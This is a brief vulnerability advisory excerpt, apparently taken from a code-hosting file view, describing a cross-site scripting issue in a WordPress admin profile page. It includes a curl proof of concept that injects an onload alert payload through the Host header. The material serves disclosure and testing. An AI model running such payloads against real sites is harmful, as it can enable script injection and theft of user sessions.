8 lines
No EOL
310 B
Text
8 lines
No EOL
310 B
Text
An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI.
|
|
|
|
The following proof of concept is available:
|
|
|
|
curl -H "Cookie: my cookies here" -H "Host: <body
|
|
onload=alert(String.fromCharCode(88,83,83))>"
|
|
http://www.example.com/wp-admin/profile.php> tmp.html
|
|
$ firefox tmp.html |